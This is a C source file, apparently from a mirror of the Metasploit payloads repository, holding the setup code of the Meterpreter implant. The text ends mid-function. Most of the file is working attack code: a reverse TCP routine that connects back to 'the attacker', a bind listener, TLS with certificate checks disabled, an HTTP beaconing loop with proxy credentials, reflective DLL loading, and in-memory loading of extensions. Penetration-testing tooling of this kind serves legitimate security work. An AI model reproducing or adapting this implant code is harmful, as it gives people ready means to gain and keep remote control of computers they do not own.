mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-03-30 22:19:17 +02:00
6ffa34aedc
metsrv now makes use of the METERRPETER_URL for stageless payloads. This value is checked when Meterpreter starts to determine what should be done with communications. If the URL indicates that the payload is stageless, it then establishes communications appropriately, depending on the configuration.
961 lines
27 KiB
C
Executable File
961 lines
27 KiB
C
Executable File
/*!
|
|
* @file server_setup.c
|
|
*/
|
|
#include "metsrv.h"
|
|
#include "../../common/common.h"
|
|
|
|
extern Command *extensionCommands;
|
|
|
|
char * global_meterpreter_transport = "METERPRETER_TRANSPORT_SSL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
|
char * global_meterpreter_url = "https://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/\x00";
|
|
char * global_meterpreter_ua = "METERPRETER_UA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
|
char * global_meterpreter_proxy = "METERPRETER_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
|
char * global_meterpreter_proxy_username = "METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
|
char * global_meterpreter_proxy_password = "METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
|
int global_expiration_timeout = 0xb64be661;
|
|
int global_comm_timeout = 0xaf79257f;
|
|
|
|
/*! @brief Number of milliseconds to wait before connection retries. */
|
|
const DWORD RETRY_TIMEOUT_MS = 1000;
|
|
|
|
#ifdef _WIN32
|
|
|
|
#include <windows.h> // for EXCEPTION_ACCESS_VIOLATION
|
|
#include <excpt.h>
|
|
|
|
// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
|
|
|
|
// include the Reflectiveloader() function
|
|
#include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
|
|
|
int exceptionfilter(unsigned int code, struct _EXCEPTION_POINTERS *ep)
|
|
{
|
|
return EXCEPTION_EXECUTE_HANDLER;
|
|
}
|
|
|
|
#define InitAppInstance() { if( hAppInstance == NULL ) hAppInstance = GetModuleHandle( NULL ); }
|
|
|
|
#else
|
|
#define InitAppInstance()
|
|
#define exceptionfilter(a, b)
|
|
#define SetHandleInformation(a, b, c)
|
|
#define ExitThread(x) exit((x))
|
|
const unsigned int hAppInstance = 0x504b5320; // 'PKS '
|
|
#endif
|
|
|
|
#define PREPEND_ERROR "### Error: "
|
|
#define PREPEND_INFO "### Info : "
|
|
#define PREPEND_WARN "### Warn : "
|
|
|
|
/*! @brief This thread is the main server thread. */
|
|
static THREAD * serverThread = NULL;
|
|
|
|
/*! @brief An array of locks for use by OpenSSL. */
|
|
static LOCK ** ssl_locks = NULL;
|
|
|
|
/*!
|
|
* @brief Connects to a provided host/port, downloads a payload and executes it.
|
|
* @param host String containing the name or IP of the host to connect to.
|
|
* @param port Port number to connect to.
|
|
* @param retryAttempts The number of times to attempt to retry.
|
|
*/
|
|
DWORD reverse_tcp(const char* host, u_short port, short retryAttempts, SOCKET* socketBuffer)
|
|
{
|
|
*socketBuffer = 0;
|
|
|
|
// start by attempting to fire up Winsock.
|
|
WSADATA wsaData = { 0 };
|
|
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
|
|
{
|
|
return WSAGetLastError();
|
|
}
|
|
|
|
// prepare to connect to the attacker
|
|
SOCKET socketHandle = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
struct hostent* target = gethostbyname(host);
|
|
char* targetIp = inet_ntoa(*(struct in_addr *)*target->h_addr_list);
|
|
|
|
struct sockaddr_in sock = { 0 };
|
|
sock.sin_addr.s_addr = inet_addr(targetIp);
|
|
sock.sin_family = AF_INET;
|
|
sock.sin_port = htons(port);
|
|
|
|
// try connect to the attacker at least once
|
|
while (connect(socketHandle, (struct sockaddr*)&sock, sizeof(sock)) == SOCKET_ERROR)
|
|
{
|
|
// retry with a sleep if it fails, or exit the process on failure
|
|
if (retryAttempts-- <= 0)
|
|
{
|
|
return WSAGetLastError();
|
|
}
|
|
|
|
Sleep(RETRY_TIMEOUT_MS);
|
|
}
|
|
|
|
*socketBuffer = socketHandle;
|
|
|
|
return ERROR_SUCCESS;
|
|
}
|
|
|
|
/*!
|
|
* @brief Listens on a port for an incoming payload request.
|
|
* @param port Port number to listen on.
|
|
*/
|
|
DWORD bind_tcp(u_short port, SOCKET* socketBuffer)
|
|
{
|
|
*socketBuffer = 0;
|
|
|
|
// start by attempting to fire up Winsock.
|
|
WSADATA wsaData = { 0 };
|
|
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
|
|
{
|
|
return WSAGetLastError();
|
|
}
|
|
|
|
// prepare a connection listener for the attacker to connect to
|
|
SOCKET listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
|
|
struct sockaddr_in sock = { 0 };
|
|
sock.sin_addr.s_addr = inet_addr("0.0.0.0");
|
|
sock.sin_family = AF_INET;
|
|
sock.sin_port = htons(port);
|
|
|
|
if (bind(listenSocket, (SOCKADDR *)&sock, sizeof(struct sockaddr_in)) == SOCKET_ERROR)
|
|
{
|
|
return WSAGetLastError();
|
|
}
|
|
|
|
if (listen(listenSocket, 1) == SOCKET_ERROR)
|
|
{
|
|
return WSAGetLastError();
|
|
}
|
|
|
|
// Setup, ready to go, now wait for the connection.
|
|
SOCKET acceptSocket = accept(listenSocket, NULL, NULL);
|
|
if (acceptSocket == INVALID_SOCKET)
|
|
{
|
|
return WSAGetLastError();
|
|
}
|
|
|
|
// don't bother listening for other connections
|
|
closesocket(listenSocket);
|
|
|
|
*socketBuffer = acceptSocket;
|
|
return ERROR_SUCCESS;
|
|
}
|
|
|
|
DWORD estbalish_tcp_connection(char* url, SOCKET* socketBuffer)
|
|
{
|
|
if (strncmp(url, "tcp://", 6) == 0)
|
|
{
|
|
char* pHost = strstr(url, "//") + 2;
|
|
char* pPort = strstr(pHost, ":") + 1;
|
|
u_short usPort = (u_short)atoi(pPort);
|
|
|
|
// if no host is specified, then we can assume that this is a bind payload, otherwise
|
|
// we'll assume that the payload is a reverse_tcp one and the given host is valid
|
|
// TODO: check to make sure this is a valid thing to do with IPv6
|
|
if (*pHost == ':')
|
|
{
|
|
return bind_tcp(usPort, socketBuffer);
|
|
}
|
|
|
|
const int iRetryAttempts = 30;
|
|
*(pPort - 1) = '\0';
|
|
return reverse_tcp(pHost, usPort, iRetryAttempts, socketBuffer);
|
|
}
|
|
return ERROR_SUCCESS;
|
|
}
|
|
|
|
/*!
|
|
* @brief A callback function used by OpenSSL to leverage native system locks.
|
|
* @param mode The lock mode to set.
|
|
* @param type The lock type to operate on.
|
|
* @param file Unused.
|
|
* @param line Unused.
|
|
*/
|
|
static VOID server_locking_callback(int mode, int type, const char * file, int line)
|
|
{
|
|
if (mode & CRYPTO_LOCK)
|
|
{
|
|
lock_acquire(ssl_locks[type]);
|
|
}
|
|
else
|
|
{
|
|
lock_release(ssl_locks[type]);
|
|
}
|
|
}
|
|
|
|
/*!
|
|
* @brief A callback function used by OpenSSL to get the current threads id.
|
|
* @returns The current thread ID.
|
|
* @remarks While not needed on windows this must be used for posix meterpreter.
|
|
*/
|
|
static long unsigned int server_threadid_callback(VOID)
|
|
{
|
|
#ifdef _WIN32
|
|
return GetCurrentThreadId();
|
|
#else
|
|
return pthread_self();
|
|
#endif
|
|
}
|
|
|
|
/*!
|
|
* @brief A callback function for dynamic lock creation for OpenSSL.
|
|
* @returns A pointer to a lock that can be used for synchronisation.
|
|
* @param file _Ignored_
|
|
* @param line _Ignored_
|
|
*/
|
|
static struct CRYPTO_dynlock_value* server_dynamiclock_create(const char * file, int line)
|
|
{
|
|
return (struct CRYPTO_dynlock_value*)lock_create();
|
|
}
|
|
|
|
/*!
|
|
* @brief A callback function for dynamic lock locking for OpenSSL.
|
|
* @param mode A bitmask which indicates the lock mode.
|
|
* @param l A point to the lock instance.
|
|
* @param file _Ignored_
|
|
* @param line _Ignored_
|
|
*/
|
|
static void server_dynamiclock_lock(int mode, struct CRYPTO_dynlock_value* l, const char* file, int line)
|
|
{
|
|
LOCK * lock = (LOCK *)l;
|
|
|
|
if (mode & CRYPTO_LOCK)
|
|
{
|
|
lock_acquire(lock);
|
|
}
|
|
else
|
|
{
|
|
lock_release(lock);
|
|
}
|
|
}
|
|
|
|
/*!
|
|
* @brief A callback function for dynamic lock destruction for OpenSSL.
|
|
* @param l A point to the lock instance.
|
|
* @param file _Ignored_
|
|
* @param line _Ignored_
|
|
*/
|
|
static void server_dynamiclock_destroy(struct CRYPTO_dynlock_value* l, const char * file, int line)
|
|
{
|
|
lock_destroy((LOCK *)l);
|
|
}
|
|
|
|
/*!
|
|
* @brief Flush all pending data on the connected socket before doing SSL.
|
|
* @param remote Pointer to the remote instance.
|
|
*/
|
|
static VOID server_socket_flush(Remote * remote)
|
|
{
|
|
fd_set fdread;
|
|
DWORD ret;
|
|
SOCKET fd;
|
|
char buff[4096];
|
|
|
|
lock_acquire(remote->lock);
|
|
|
|
fd = remote_get_fd(remote);
|
|
|
|
while (1)
|
|
{
|
|
struct timeval tv;
|
|
LONG data;
|
|
|
|
FD_ZERO(&fdread);
|
|
FD_SET(fd, &fdread);
|
|
|
|
// Wait for up to one second for any errant socket data to appear
|
|
tv.tv_sec = 1;
|
|
tv.tv_usec = 0;
|
|
|
|
data = select((int)fd + 1, &fdread, NULL, NULL, &tv);
|
|
if (data == 0)
|
|
{
|
|
break;
|
|
}
|
|
|
|
ret = recv(fd, buff, sizeof(buff), 0);
|
|
dprintf("[SERVER] Flushed %d bytes from the buffer", ret);
|
|
|
|
// The socket closed while we waited
|
|
if (ret == 0)
|
|
{
|
|
break;
|
|
}
|
|
continue;
|
|
}
|
|
|
|
lock_release(remote->lock);
|
|
}
|
|
|
|
/*!
|
|
* @brief Poll a socket for data to recv and block when none available.
|
|
* @param remote Pointer to the remote instance.
|
|
* @param timeout Amount of time to wait before the poll times out.
|
|
*/
|
|
static LONG server_socket_poll(Remote * remote, long timeout)
|
|
{
|
|
struct timeval tv;
|
|
LONG result;
|
|
fd_set fdread;
|
|
SOCKET fd;
|
|
|
|
lock_acquire(remote->lock);
|
|
|
|
fd = remote_get_fd(remote);
|
|
|
|
FD_ZERO(&fdread);
|
|
FD_SET(fd, &fdread);
|
|
|
|
tv.tv_sec = 0;
|
|
tv.tv_usec = timeout;
|
|
|
|
result = select((int)fd + 1, &fdread, NULL, NULL, &tv);
|
|
|
|
#ifndef _WIN32
|
|
// Handle EAGAIN, etc.
|
|
if(result == -1)
|
|
{
|
|
if(errno == EINTR || errno == EAGAIN || errno == EWOULDBLOCK)
|
|
{
|
|
result = 0;
|
|
}
|
|
}
|
|
#endif
|
|
|
|
lock_release(remote->lock);
|
|
|
|
return result;
|
|
}
|
|
|
|
/*!
|
|
* @brief Initialize the OpenSSL subsystem for use in a multi threaded enviroment.
|
|
* @param remote Pointer to the remote instance.
|
|
*/
|
|
static BOOL server_initialize_ssl(Remote * remote)
|
|
{
|
|
int i = 0;
|
|
|
|
lock_acquire(remote->lock);
|
|
|
|
// Begin to bring up the OpenSSL subsystem...
|
|
CRYPTO_malloc_init();
|
|
SSL_load_error_strings();
|
|
SSL_library_init();
|
|
|
|
// Setup the required OpenSSL multi-threaded enviroment...
|
|
ssl_locks = (LOCK**)malloc(CRYPTO_num_locks() * sizeof(LOCK *));
|
|
if (ssl_locks == NULL)
|
|
{
|
|
lock_release(remote->lock);
|
|
return FALSE;
|
|
}
|
|
|
|
for (i = 0; i < CRYPTO_num_locks(); i++)
|
|
{
|
|
ssl_locks[i] = lock_create();
|
|
}
|
|
|
|
CRYPTO_set_id_callback(server_threadid_callback);
|
|
CRYPTO_set_locking_callback(server_locking_callback);
|
|
CRYPTO_set_dynlock_create_callback(server_dynamiclock_create);
|
|
CRYPTO_set_dynlock_lock_callback(server_dynamiclock_lock);
|
|
CRYPTO_set_dynlock_destroy_callback(server_dynamiclock_destroy);
|
|
|
|
lock_release(remote->lock);
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
/*!
|
|
* @brief Bring down the OpenSSL subsystem
|
|
* @return Indication of success or failure.
|
|
* @param remote Pointer to the remote instance.
|
|
*/
|
|
static BOOL server_destroy_ssl(Remote * remote)
|
|
{
|
|
int i = 0;
|
|
|
|
if (remote == NULL)
|
|
{
|
|
return FALSE;
|
|
}
|
|
|
|
dprintf("[SERVER] Destroying SSL");
|
|
|
|
lock_acquire(remote->lock);
|
|
|
|
SSL_free(remote->ssl);
|
|
|
|
SSL_CTX_free(remote->ctx);
|
|
|
|
CRYPTO_set_locking_callback(NULL);
|
|
CRYPTO_set_id_callback(NULL);
|
|
CRYPTO_set_dynlock_create_callback(NULL);
|
|
CRYPTO_set_dynlock_lock_callback(NULL);
|
|
CRYPTO_set_dynlock_destroy_callback(NULL);
|
|
|
|
for (i = 0; i < CRYPTO_num_locks(); i++)
|
|
{
|
|
lock_destroy(ssl_locks[i]);
|
|
}
|
|
|
|
free(ssl_locks);
|
|
|
|
lock_release(remote->lock);
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
/*
|
|
*/
|
|
/*!
|
|
* @brief Negotiate SSL on the socket.
|
|
* @return Indication of success or failure.
|
|
* @param remote Pointer to the remote instance.
|
|
*/
|
|
static BOOL server_negotiate_ssl(Remote *remote)
|
|
{
|
|
BOOL success = TRUE;
|
|
SOCKET fd = 0;
|
|
DWORD ret = 0;
|
|
DWORD res = 0;
|
|
|
|
lock_acquire(remote->lock);
|
|
|
|
do
|
|
{
|
|
fd = remote_get_fd(remote);
|
|
|
|
remote->meth = TLSv1_client_method();
|
|
|
|
remote->ctx = SSL_CTX_new(remote->meth);
|
|
SSL_CTX_set_mode(remote->ctx, SSL_MODE_AUTO_RETRY);
|
|
|
|
remote->ssl = SSL_new(remote->ctx);
|
|
SSL_set_verify(remote->ssl, SSL_VERIFY_NONE, NULL);
|
|
|
|
if (SSL_set_fd(remote->ssl, (int)remote->fd) == 0)
|
|
{
|
|
dprintf("[SERVER] set fd failed");
|
|
success = FALSE;
|
|
break;
|
|
}
|
|
|
|
do
|
|
{
|
|
if ((ret = SSL_connect(remote->ssl)) != 1)
|
|
{
|
|
res = SSL_get_error(remote->ssl, ret);
|
|
dprintf("[SERVER] connect failed %d\n", res);
|
|
|
|
if (res == SSL_ERROR_WANT_READ || res == SSL_ERROR_WANT_WRITE)
|
|
{
|
|
// Catch non-blocking socket errors and retry
|
|
continue;
|
|
}
|
|
|
|
success = FALSE;
|
|
break;
|
|
}
|
|
} while (ret != 1);
|
|
|
|
if (success == FALSE) break;
|
|
|
|
dprintf("[SERVER] Sending a HTTP GET request to the remote side...");
|
|
|
|
if ((ret = SSL_write(remote->ssl, "GET /123456789 HTTP/1.0\r\n\r\n", 27)) <= 0)
|
|
{
|
|
dprintf("[SERVER] SSL write failed during negotiation with return: %d (%d)", ret, SSL_get_error(remote->ssl, ret));
|
|
}
|
|
|
|
} while (0);
|
|
|
|
lock_release(remote->lock);
|
|
|
|
dprintf("[SERVER] Completed writing the HTTP GET request: %d", ret);
|
|
|
|
if (ret < 0)
|
|
{
|
|
success = FALSE;
|
|
}
|
|
|
|
return success;
|
|
}
|
|
|
|
/*!
|
|
* @brief The servers main dispatch loop for incoming requests using SSL over TCP
|
|
* @param remote Pointer to the remote endpoint for this server connection.
|
|
* @returns Indication of success or failure.
|
|
*/
|
|
static DWORD server_dispatch(Remote * remote)
|
|
{
|
|
BOOL running = TRUE;
|
|
LONG result = ERROR_SUCCESS;
|
|
Packet * packet = NULL;
|
|
THREAD * cpt = NULL;
|
|
|
|
dprintf("[DISPATCH] entering server_dispatch( 0x%08X )", remote);
|
|
|
|
// Bring up the scheduler subsystem.
|
|
result = scheduler_initialize(remote);
|
|
if (result != ERROR_SUCCESS)
|
|
{
|
|
return result;
|
|
}
|
|
|
|
while (running)
|
|
{
|
|
if (event_poll(serverThread->sigterm, 0))
|
|
{
|
|
dprintf("[DISPATCH] server dispatch thread signaled to terminate...");
|
|
break;
|
|
}
|
|
|
|
result = server_socket_poll(remote, 100);
|
|
if (result > 0)
|
|
{
|
|
result = packet_receive(remote, &packet);
|
|
if (result != ERROR_SUCCESS)
|
|
{
|
|
dprintf("[DISPATCH] packet_receive returned %d, exiting dispatcher...", result);
|
|
break;
|
|
}
|
|
|
|
running = command_handle(remote, packet);
|
|
dprintf("[DISPATCH] command_process result: %s", (running ? "continue" : "stop"));
|
|
}
|
|
else if (result < 0)
|
|
{
|
|
dprintf("[DISPATCH] server_socket_poll returned %d, exiting dispatcher...", result);
|
|
break;
|
|
}
|
|
}
|
|
|
|
dprintf("[DISPATCH] calling scheduler_destroy...");
|
|
scheduler_destroy();
|
|
|
|
dprintf("[DISPATCH] calling command_join_threads...");
|
|
command_join_threads();
|
|
|
|
dprintf("[DISPATCH] leaving server_dispatch.");
|
|
|
|
return result;
|
|
}
|
|
|
|
#ifdef _WIN32
|
|
/*
|
|
* The servers main dispatch loop for incoming requests using SSL over TCP
|
|
*/
|
|
static DWORD server_dispatch_http_wininet(Remote * remote)
|
|
{
|
|
BOOL running = TRUE;
|
|
LONG result = ERROR_SUCCESS;
|
|
Packet * packet = NULL;
|
|
THREAD * cpt = NULL;
|
|
URL_COMPONENTS bits;
|
|
DWORD ecount = 0;
|
|
DWORD delay = 0;
|
|
char tmpHostName[512];
|
|
char tmpUrlPath[1024];
|
|
|
|
remote->expiration_time = 0;
|
|
if (global_expiration_timeout > 0)
|
|
{
|
|
remote->expiration_time = current_unix_timestamp() + global_expiration_timeout;
|
|
}
|
|
|
|
remote->comm_timeout = global_comm_timeout;
|
|
remote->start_time = current_unix_timestamp();
|
|
remote->comm_last_packet = current_unix_timestamp();
|
|
|
|
// Allocate the top-level handle
|
|
if (!strcmp(global_meterpreter_proxy, "METERPRETER_PROXY"))
|
|
{
|
|
remote->hInternet = InternetOpen(global_meterpreter_ua, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
|
|
}
|
|
else
|
|
{
|
|
remote->hInternet = InternetOpen(global_meterpreter_ua, INTERNET_OPEN_TYPE_PROXY, global_meterpreter_proxy, NULL, 0);
|
|
}
|
|
|
|
if (!remote->hInternet)
|
|
{
|
|
dprintf("[DISPATCH] Failed InternetOpen: %d", GetLastError());
|
|
return 0;
|
|
}
|
|
|
|
dprintf("[DISPATCH] Configured hInternet: 0x%.8x", remote->hInternet);
|
|
|
|
// The InternetCrackUrl method was poorly designed...
|
|
memset(tmpHostName, 0, sizeof(tmpHostName));
|
|
memset(tmpUrlPath, 0, sizeof(tmpUrlPath));
|
|
|
|
memset(&bits, 0, sizeof(bits));
|
|
bits.dwStructSize = sizeof(bits);
|
|
bits.dwHostNameLength = sizeof(tmpHostName)-1;
|
|
bits.lpszHostName = tmpHostName;
|
|
bits.dwUrlPathLength = sizeof(tmpUrlPath)-1;
|
|
bits.lpszUrlPath = tmpUrlPath;
|
|
|
|
InternetCrackUrl(remote->url, 0, 0, &bits);
|
|
|
|
remote->uri = _strdup(tmpUrlPath);
|
|
|
|
dprintf("[DISPATCH] Configured URL: %s", remote->uri);
|
|
dprintf("[DISPATCH] Host: %s Port: %u", tmpHostName, bits.nPort);
|
|
|
|
// Allocate the connection handle
|
|
remote->hConnection = InternetConnect(remote->hInternet, tmpHostName, bits.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
|
|
if (!remote->hConnection)
|
|
{
|
|
dprintf("[DISPATCH] Failed InternetConnect: %d", GetLastError());
|
|
return 0;
|
|
}
|
|
|
|
dprintf("[DISPATCH] Configured hConnection: 0x%.8x", remote->hConnection);
|
|
|
|
//authentication
|
|
if (!(strcmp(global_meterpreter_proxy_username, "METERPRETER_USERNAME_PROXY") == 0))
|
|
{
|
|
InternetSetOption(remote->hConnection, INTERNET_OPTION_PROXY_USERNAME, global_meterpreter_proxy_username, (DWORD)strlen(global_meterpreter_proxy_username) + 1);
|
|
InternetSetOption(remote->hConnection, INTERNET_OPTION_PROXY_PASSWORD, global_meterpreter_proxy_password, (DWORD)strlen(global_meterpreter_proxy_password) + 1);
|
|
dprintf("[DISPATCH] Proxy authentication configured : %s/%s", global_meterpreter_proxy_username, global_meterpreter_proxy_password);
|
|
}
|
|
|
|
// Bring up the scheduler subsystem.
|
|
result = scheduler_initialize(remote);
|
|
if (result != ERROR_SUCCESS)
|
|
{
|
|
return result;
|
|
}
|
|
|
|
while (running)
|
|
{
|
|
if (remote->comm_timeout != 0 && remote->comm_last_packet + remote->comm_timeout < current_unix_timestamp())
|
|
{
|
|
dprintf("[DISPATCH] Shutting down server due to communication timeout");
|
|
break;
|
|
}
|
|
|
|
if (remote->expiration_time != 0 && remote->expiration_time < current_unix_timestamp())
|
|
{
|
|
dprintf("[DISPATCH] Shutting down server due to hardcoded expiration time");
|
|
dprintf("Timestamp: %u Expiration: %u", current_unix_timestamp(), remote->expiration_time);
|
|
break;
|
|
}
|
|
|
|
if (event_poll(serverThread->sigterm, 0))
|
|
{
|
|
dprintf("[DISPATCH] server dispatch thread signaled to terminate...");
|
|
break;
|
|
}
|
|
|
|
dprintf("[DISPATCH] Reading data from the remote side...");
|
|
result = packet_receive(remote, &packet);
|
|
if (result != ERROR_SUCCESS)
|
|
{
|
|
|
|
// Update the timestamp for empty replies
|
|
if (result == ERROR_EMPTY)
|
|
{
|
|
remote->comm_last_packet = current_unix_timestamp();
|
|
}
|
|
|
|
if (ecount < 10)
|
|
{
|
|
delay = 10 * ecount;
|
|
}
|
|
else
|
|
{
|
|
delay = 100 * ecount;
|
|
}
|
|
|
|
ecount++;
|
|
|
|
dprintf("[DISPATCH] no pending packets, sleeping for %dms...", min(10000, delay));
|
|
Sleep(min(10000, delay));
|
|
continue;
|
|
}
|
|
|
|
remote->comm_last_packet = current_unix_timestamp();
|
|
|
|
// Reset the empty count when we receive a packet
|
|
ecount = 0;
|
|
|
|
dprintf("[DISPATCH] Returned result: %d", result);
|
|
|
|
running = command_handle(remote, packet);
|
|
dprintf("[DISPATCH] command_process result: %s", (running ? "continue" : "stop"));
|
|
}
|
|
|
|
// Close WinInet handles
|
|
InternetCloseHandle(remote->hConnection);
|
|
InternetCloseHandle(remote->hInternet);
|
|
|
|
dprintf("[DISPATCH] calling scheduler_destroy...");
|
|
scheduler_destroy();
|
|
|
|
dprintf("[DISPATCH] calling command_join_threads...");
|
|
command_join_threads();
|
|
|
|
dprintf("[DISPATCH] leaving server_dispatch.");
|
|
|
|
return result;
|
|
}
|
|
|
|
#endif
|
|
|
|
/*
|
|
* Get the session id that this meterpreter server is running in.
|
|
*/
|
|
DWORD server_sessionid()
|
|
{
|
|
#ifdef _WIN32
|
|
typedef BOOL (WINAPI * PROCESSIDTOSESSIONID)( DWORD pid, LPDWORD id );
|
|
|
|
static PROCESSIDTOSESSIONID pProcessIdToSessionId = NULL;
|
|
HMODULE hKernel = NULL;
|
|
DWORD dwSessionId = 0;
|
|
|
|
do
|
|
{
|
|
if (!pProcessIdToSessionId)
|
|
{
|
|
hKernel = LoadLibrary("kernel32.dll");
|
|
if (hKernel)
|
|
{
|
|
pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress(hKernel, "ProcessIdToSessionId");
|
|
}
|
|
}
|
|
|
|
if (!pProcessIdToSessionId)
|
|
{
|
|
break;
|
|
}
|
|
|
|
if (!pProcessIdToSessionId(GetCurrentProcessId(), &dwSessionId))
|
|
{
|
|
dwSessionId = -1;
|
|
}
|
|
|
|
} while( 0 );
|
|
|
|
if (hKernel)
|
|
{
|
|
FreeLibrary(hKernel);
|
|
}
|
|
|
|
return dwSessionId;
|
|
#else
|
|
return -1;
|
|
#endif
|
|
}
|
|
|
|
VOID load_stageless_extensions(Remote* pRemote, ULONG_PTR fd)
|
|
{
|
|
LPBYTE pExtensionStart = (LPBYTE)fd + sizeof(DWORD);
|
|
DWORD size = *((LPDWORD)(pExtensionStart - sizeof(DWORD)));
|
|
|
|
while (size > 0)
|
|
{
|
|
dprintf("[SERVER] Extension located at 0x%p: %u bytes", pExtensionStart, size);
|
|
HMODULE hLibrary = LoadLibraryR(pExtensionStart, size);
|
|
dprintf("[SERVER] Extension located at 0x%p: %u bytes loaded to %x", pExtensionStart, size, hLibrary);
|
|
initialise_extension(hLibrary, TRUE, pRemote, NULL, extensionCommands);
|
|
|
|
pExtensionStart += size + sizeof(DWORD);
|
|
size = *((LPDWORD)(pExtensionStart - sizeof(DWORD)));
|
|
}
|
|
|
|
dprintf("[SERVER] All stageless extensions loaded");
|
|
}
|
|
|
|
/*
|
|
* Setup and run the server. This is called from Init via the loader.
|
|
*/
|
|
DWORD server_setup(SOCKET fd)
|
|
{
|
|
Remote* pRemote = NULL;
|
|
char cStationName[256] = { 0 };
|
|
char cDesktopName[256] = { 0 };
|
|
DWORD res = 0;
|
|
|
|
// first byte of the URL indites 's' if it's stageless
|
|
BOOL bStageless = global_meterpreter_url[0] == 's';
|
|
|
|
dprintf("[SERVER] Initializing...");
|
|
|
|
#ifdef _UNIX
|
|
int local_error = 0;
|
|
#endif
|
|
|
|
// if hAppInstance is still == NULL it means that we havent been
|
|
// reflectivly loaded so we must patch in the hAppInstance value
|
|
// for use with loading server extensions later.
|
|
InitAppInstance();
|
|
|
|
srand((unsigned int)time(NULL));
|
|
|
|
__try
|
|
{
|
|
do
|
|
{
|
|
dprintf("[SERVER] module loaded at 0x%08X", hAppInstance);
|
|
|
|
// Open a THREAD item for the servers main thread, we use this to manage migration later.
|
|
serverThread = thread_open();
|
|
|
|
dprintf("[SERVER] main server thread: handle=0x%08X id=0x%08X sigterm=0x%08X", serverThread->handle, serverThread->id, serverThread->sigterm);
|
|
|
|
if (!(pRemote = remote_allocate(fd)))
|
|
{
|
|
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
|
|
break;
|
|
}
|
|
|
|
pRemote->url = global_meterpreter_url;
|
|
if (bStageless)
|
|
{
|
|
// if stageless, we ignore the first 's'
|
|
pRemote->url += 1;
|
|
}
|
|
|
|
if (strcmp(global_meterpreter_transport + 12, "TRANSPORT_SSL") == 0)
|
|
{
|
|
pRemote->transport = METERPRETER_TRANSPORT_SSL;
|
|
dprintf("[SERVER] Using SSL transport on socket %ul...", fd);
|
|
|
|
dprintf("[SERVER] setting up stageless comms if required...");
|
|
res = estbalish_tcp_connection(pRemote->url, &pRemote->fd);
|
|
